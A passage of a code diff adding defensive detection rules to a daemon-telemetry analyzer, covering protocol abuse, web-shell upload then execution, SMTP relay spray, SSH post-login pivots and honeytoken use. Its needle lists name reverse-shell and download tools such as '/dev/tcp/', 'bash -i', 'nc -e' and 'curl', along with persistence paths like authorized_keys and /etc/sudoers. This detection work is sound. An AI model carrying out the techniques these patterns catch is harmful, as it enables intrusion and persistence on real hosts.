raw) + (if (daemon-telemetry? raw) + raw + (let* ((fields (or (raw-ref raw "data") raw)) + (daemon (or (raw-ref raw "daemon") (raw-ref fields "daemon"))) + (action (or (raw-ref raw "action") (raw-ref raw "signal") + (raw-ref fields "action") (raw-ref fields "signal")))) + (and (or daemon action) + (let ((host (or (raw-ref raw "host") (raw-ref fields "host") "unknown")) + (ts (or (raw-ref raw "timestamp_ms") (raw-ref raw "ts") + (raw-ref fields "timestamp_ms") (raw-ref fields "ts") 0)) + (severity (or (raw-ref raw "severity") (raw-ref fields "severity") "info"))) + (make-daemon-telemetry host (num-val ts 0) + (str-val (or daemon "daemon")) + (str-val (or action "event")) + (str-val severity) fields)))))) + + (def (daemon-events events) + (filter-map + (lambda (ev) + (let ((n (normalize-daemon-telemetry ev))) + (and (daemon-telemetry? n) n))) + events)) + + (def (data ev) (or (hash-get ev "data") (make-hash-table))) + (def (d-ref ev k) (hash-get (data ev) k)) + (def (d-str ev k) (str-val (d-ref ev k))) + (def (d-lower ev k) (lower (d-ref ev k))) + (def (ev-host ev) (str-val (hash-get ev "host"))) + (def (ev-ts ev) (num-val (hash-get ev "timestamp_ms") 0)) + (def (ev-daemon ev) (d-lower ev "daemon")) + (def (ev-action ev) (d-lower ev "action")) + (def (ev-remote ev) (d-str ev "remote_ip")) + (def (ev-session ev) (d-str ev "session_id")) + (def (ev-user ev) (d-str ev "user")) + + (def (http-daemon? ev) + (let ((d (ev-daemon ev))) + (or (has? d "http") (has? d "nginx") (has? d "apache")))) + (def (smtp-daemon? ev) + (let ((d (ev-daemon ev))) + (or (has? d "smtp") (has? d "mail")))) + (def (ssh-daemon? ev) + (has? (ev-daemon ev) "ssh")) + + ;; Prefer session id when the daemon emits one; fall back to remote_ip+user. + (def (same-actor? a b) + (and (string=? (ev-host a) (ev-host b)) + (string=? (ev-daemon a) (ev-daemon b)) + (let ((as (ev-session a)) (bs (ev-session b))) + (if (and (nonempty? as) (nonempty? bs)) + (string=? as bs) + (let ((ar (ev-remote a)) (br (ev-remote b)) + (au (ev-user a)) (bu (ev-user b))) + (and (nonempty? ar) (nonempty? br) + (string=? ar br) + (or (not (and (nonempty? au) (nonempty? bu))) + (string=? au bu)))))))) + + (def (within-after? a b window-ms) + (let ((at (ev-ts a)) (bt (ev-ts b))) + (and (> bt at) (<= bt (+ at window-ms))))) + + (def (first-following start candidates window-ms pred) + (let ((best #f)) + (for-each + (lambda (ev) + (when (and (within-after? start ev window-ms) + (same-actor? start ev) + (pred ev) + (or (not best) (< (ev-ts ev) (ev-ts best)))) + (set! best ev))) + candidates) + best)) + + ;; ── rule: protocol_abuse ────────────────────────────────────────────────── + (def (protocol-error? ev) + (let ((a (ev-action ev)) + (reason (d-lower ev "reason"))) + (or (member-string? a '("bad_request" "malformed" "parse_error" + "protocol_error" "invalid_command")) + (truthy? (d-ref ev "protocol_error")) + (has-any? reason '("malformed" "invalid" "overflow" "desync" + "smuggling" "traversal" "too large"))))) + + (def (detect-protocol-abuse events) + (let ((counts (make-hash-table)) + (firsts (make-hash-table)) + (order '())) + (for-each + (lambda (ev) + (when (protocol-error? ev) + (let* ((bucket (quotient (ev-ts ev) protocol-window-ms)) + (key (key->string (list (ev-host ev) (ev-daemon ev) + (ev-remote ev) bucket))) + (cur (hash-get counts key))) + (unless cur (set! order (cons key order)) (hash-put! firsts key ev)) + (hash-put! counts key (+ 1 (or cur 0)))))) + (daemon-events events)) + (filter-map + (lambda (key) + (let ((count (hash-get counts key)) + (ev (hash-get firsts key))) + (and (>= count 5) + (make-anomaly "daemon_protocol_abuse" (ev-host ev) "high" (ev-ts ev) + (details-hash "daemon" (d-str ev "daemon") + "remote_ip" (ev-remote ev) + "error_count" count + "window_ms" protocol-window-ms + "sample_reason" (d-str ev "reason")))))) + (reverse order)))) + + ;; ── rule: http upload followed by script/command execution ──────────────── + (def *web-exec-suffixes* + '(".php" ".phtml" ".phar" ".jsp" ".jspx" ".asp" ".aspx" + ".cgi" ".pl" ".py" ".rb" ".sh")) + (def *shell-command-needles* + '("/dev/tcp/" "/dev/udp/" "bash -i" " sh -i" "nc -e" "ncat -e" + "socat " "mkfifo" "curl " "wget " "base64 -d" "python -c" + "perl -e" "ruby -rsocket" "php -r")) + + (def (web-exec-path? path) + (let ((p (string-downcase path))) + (or (has? p "/cgi-bin/") + (has? p "authorized_keys") + (any (lambda (sfx) (string-suffix? sfx p)) *web-exec-suffixes*)))) + + (def (http-upload? ev) + (and (http-daemon? ev) + (let ((a (ev-action ev)) + (method (d-lower ev "method")) + (path (d-str ev "path"))) + (and (or (member-string? a '("upload" "write" "file_write")) + (and (member-string? method '("put" "post")) + (has? (string-downcase path) "/upload"))) + (web-exec-path? path))))) + + (def (http-exec? ev) + (and (http-daemon? ev) + (let ((a (ev-action ev)) + (path (d-str ev "path")) + (cmd (d-lower ev "command"))) + (or (member-string? a '("exec" "spawn" "cgi_exec" "script_exec")) + (and (web-exec-path? path) (has-any? cmd *shell-command-needles*)))))) + + (def (detect-http-upload-exec events) + (let* ((evs (daemon-events events)) + (uploads (filter http-upload? evs)) + (execs (filter http-exec? evs))) + (filter-map + (lambda (up) + (let ((ex (first-following up execs http-sequence-window-ms http-exec?))) + (and ex + (make-anomaly "daemon_http_upload_exec" (ev-host up) "critical" (ev-ts ex) + (details-hash "daemon" (d-str up "daemon") + "remote_ip" (ev-remote up) + "session_id" (ev-session up) + "path" (d-str up "path") + "command" (d-str ex "command") + "gap_seconds" (quotient (- (ev-ts ex) (ev-ts up)) 1000)))))) + uploads))) + + ;; ── rule: smtp relay / recipient spray ──────────────────────────────────── + (def (smtp-relay-spray-signal? ev) + (and (smtp-daemon? ev) + (let ((a (ev-action ev)) + (reason (d-lower ev "reason"))) + (or (member-string? a '("relay_denied" "rcpt_denied" + "recipient_denied" "auth_failed")) + (has? reason "relay") + (has? reason "recipient denied"))))) + + (def (detect-smtp-relay-spray events) + (let ((groups (make-hash-table)) (order '())) + (for-each + (lambda (ev) + (when (smtp-relay-spray-signal? ev) + (let* ((bucket (quotient (ev-ts ev) smtp-window-ms)) + (key (key->string (list (ev-host ev) (ev-daemon ev) + (ev-remote ev) bucket))) + (g (or (hash-get groups key) + (let ((h (make-hash-table))) + (hash-put! h "first" ev) + (hash-put! h "count" 0) + (hash-put! h "recipients" (make-hash-table)) + (set! order (cons key order)) + h)))) + (hash-put! groups key g) + (hash-put! g "count" (+ 1 (hash-get g "count"))) + (let ((rcpt (or (d-ref ev "recipient") (d-ref ev "username")))) + (when rcpt (hash-put! (hash-get g "recipients") (str-val rcpt) #t)))))) + (daemon-events events)) + (filter-map + (lambda (key) + (let* ((g (hash-get groups key)) + (ev (hash-get g "first")) + (count (hash-get g "count")) + (distinct (length (hash-keys (hash-get g "recipients"))))) + (and (or (>= count 10) (>= distinct 5)) + (make-anomaly "daemon_smtp_relay_spray" (ev-host ev) "high" (ev-ts ev) + (details-hash "daemon" (d-str ev "daemon") + "remote_ip" (ev-remote ev) + "attempt_count" count + "distinct_recipients" distinct + "window_ms" smtp-window-ms))))) + (reverse order)))) + + ;; ── rule: ssh post-auth pivot signals ───────────────────────────────────── + (def (ssh-auth-success? ev) + (and (ssh-daemon? ev) + (member-string? (ev-action ev) '("auth" "login" "session_open")) + (or (truthy? (d-ref ev "success")) + (member-string? (d-lower ev "status") '("success" "accepted"))))) + + (def (sensitive-ssh-write? path) + (let ((p (string-downcase path))) + (or (has? p "authorized_keys") + (has? p "/etc/sudoers") + (has? p "/etc/cron") + (has? p "/.ssh/") + (has? p "/etc/systemd/")))) + + (def (ssh-pivot-reason ev) + (and (ssh-daemon? ev) + (let ((a (ev-action ev)) + (path (d-str ev "path")) + (cmd (d-lower ev "command")) + (target (d-str ev "target"))) + (cond + ((member-string? a '("port_forward" "tcp_forward" "agent_forward")) + (str "SSH forwarding enabled to " target)) + ((and (member-string? a '("sftp_write" "scp_write" "file_write")) + (sensitive-ssh-write? path)) + (str "SSH wrote sensitive path " path)) + ((and (string=? a "exec") (has-any? cmd *shell-command-needles*)) + (str "SSH executed suspicious command " (d-str ev "command"))) + (else #f))))) + + (def (detect-ssh-postauth-pivot events) + (let* ((evs (daemon-events events)) + (auths (filter ssh-auth-success? evs)) + (signals (filter ssh-pivot-reason evs)) + (seen (make-hash-table))) + (filter-map + (lambda (auth) + (let ((sig (first-following auth signals ssh-sequence-window-ms + (lambda (ev) (and (ssh-pivot-reason ev) #t))))) + (and sig + (let ((key (key->string (list (ev-host sig) (ev-session sig) + (ev-action sig) (ev-ts sig))))) + (and (not (hash-get seen key)) + (begin + (hash-put! seen key #t) + (make-anomaly "daemon_ssh_postauth_pivot" (ev-host sig) "critical" (ev-ts sig) + (details-hash "daemon" (d-str sig "daemon") + "remote_ip" (ev-remote sig) + "user" (ev-user sig) + "session_id" (ev-session sig) + "action" (d-str sig "action") + "path" (d-str sig "path") + "command" (d-str sig "command") + "reason" (ssh-pivot-reason sig) + "gap_seconds" (quotient (- (ev-ts sig) (ev-ts auth)) 1000))))))))) + auths))) + + ;; ── rule: canary / honeytoken use ───────────────────────────────────────── + (def (canary-event? ev) + (or (truthy? (d-ref ev "canary")) + (member-string? (d-lower ev "credential_class") '("canary" "honeytoken" "honey")) + (member-string? (d-lower ev "token_type") '("canary" "honeytoken" "honey")))) + + (def (detect-canary-use events) + (filter-map + (lambda (ev) + (and (canary-event? ev) + (make-anomaly "daemon_canary_use" (ev-host ev) "critical" (ev-ts ev) + (details-hash "daemon" (d-str ev "daemon") + "action" (d-str ev "action") + "remote_ip" (ev-remote ev) + "user" (ev-user ev) + "token_id" (d-str ev "token_id")))))